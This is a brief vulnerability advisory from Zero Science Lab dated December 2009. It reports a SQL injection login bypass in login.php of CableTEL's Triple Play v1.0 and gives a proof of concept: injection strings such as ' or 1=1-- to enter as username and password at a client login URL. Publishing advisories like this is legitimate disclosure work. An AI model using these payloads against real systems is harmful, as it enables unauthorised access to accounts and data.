CableTEL's Triple Play version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
980815ba4d4c7c916b860334459997b4fbba509ae415c307121b9de7a89edb7f
##############################################################################
CableTEL's Triple Play v1.0 (login.php) Remote Login Bypass SQL Injection Exploit
21.12.2009
by Gjoko 'LiquidWorm' Krstic
Zero Science Lab
http://www.zeroscience.mk
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4925.php
##############################################################################
PoC:
https://clients.[site]/clients/index.php
user and pass:
'+ '+
[space] [space]
' or 1=1-- ' or 1=1--